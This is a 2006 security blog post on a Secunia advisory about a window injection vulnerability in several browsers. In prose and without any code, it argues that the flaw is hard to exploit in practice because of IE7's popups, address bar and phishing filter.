Spyware Sucks
“There is no magic fairy dust protecting Macs" – Dai Zovi, author of “The Mac Hacker’s Handbook"

Moderately critical IE7, Firefox, Mozilla, Opera, Safari and Konqueror vulnerabiity at Secunia

October 30th 2006 in Uncategorized

Jeez, I tell you, this was one *irritating*, in your face, damned obvious to anybody paying a modicum of attention that something weird is going on, vulnerability to check out … listed as 'moderately critical'.

The test works – but only once – you have to refresh the page to get it to work multiple times.

Internet Explorer 7 Window Injection Vulnerability
http://secunia.com/advisories/22628/

To be fair, the vulnerability affects many Web browsers and operating systems.

Web browsers: Internet Explorer, Mozilla, Firefox, Opera, Safari, Konqueror (it looks like FF2 may be immune)

Operating Systems: Windows, Linux variants, UNIX variants, Mac OS

The vulnerability is that a website can inject content into another site's window if the target name of the window is known.  So first of all you have to have the hostile site open, then the hostile site has to convince you to go to a second site, then the hostile site has to know what you are going to click on so that it can inject content.

If the hostile site is closed after the other site is opened, the exploit does not work.

Let's be realistic here. For a vulnerability to be truly successful it has to be able to easily fool the user.  The fact of the existence of a vulnerability or weakness does not mean it can realistically be exploited… weird or unusual behaviour is going to grab the user's attention.

Imagine, if you will, that you go to a fake Bank Web site – assuming the page isn't blocked by the phishing filter in the first place – then it has to convince you to click on a link that leads to a legitimate Web site… then the owners of the hostile site have to hope that your computer doesn't goes nuts from the hundreds of popups per minute that are being generated.  The constant clicking from the blizzard of 2 to 3 pop-ups per second is a dead giveaway that something is wrong to anybody using IE7 with its default settings.

Auscert says "This is of particular concern for accessing secure sites which routinely open a new window for user logon with no location bar, since the attacker can overwrite the real logon window with a fake logon window."    It should be noted that IE7 displays an addressbar on all windows, even user logon windows which normally do not display an addressbar, unless the user chooses to turn that option off via Security settings.

Edit: The Microsoft Security Response Team responds:
http://blogs.technet.com/msrc/archive/2006/10/31/information-on-address-bar-issue.aspx

So, to summarise… if the user has not turned off the addressbar for popups, or does not see that the address is wrong, if the user does not close the hostile Web site, if the user has turned off the IE sound cue that a pop-up has been blocked or the system does not have a sound card or speakers, if the user has turned off the info-bar, or the user has disabled the pop-up blocker, then the chances of success go up marginally – but the site still has to get around the phishing filter.  And it has to get around the problem of convincing users to trust a site if hundreds of pop-ups within a couple of minutes is not normal behaviour for the site being spoofed.


Comments are closed.

Not too shabby for 12 months of misbehaviour… http://australianit.news.com.au/articles/0,7204,20669063%5E15306%5E%5Enbv%5E,00.html"A PERTH-based company has been fined $5.5 million for sending millions of unsolicited emails, with a judge labelling the spam annoying, costly to combat, and a threat to the internet.It is the first time an Australian company has been fined under the federal Government's spam laws, introduced in […]

Previous Entry

Its been around since June 2006, and some said it was fixed in Firefox 1.5.0.7, but it's back…http://www.securityfocus.com/bid/19488Further information:http://nvd.nist.gov/nvd.cfm?cvename=CVE-2006-4253

Next Entry

Archives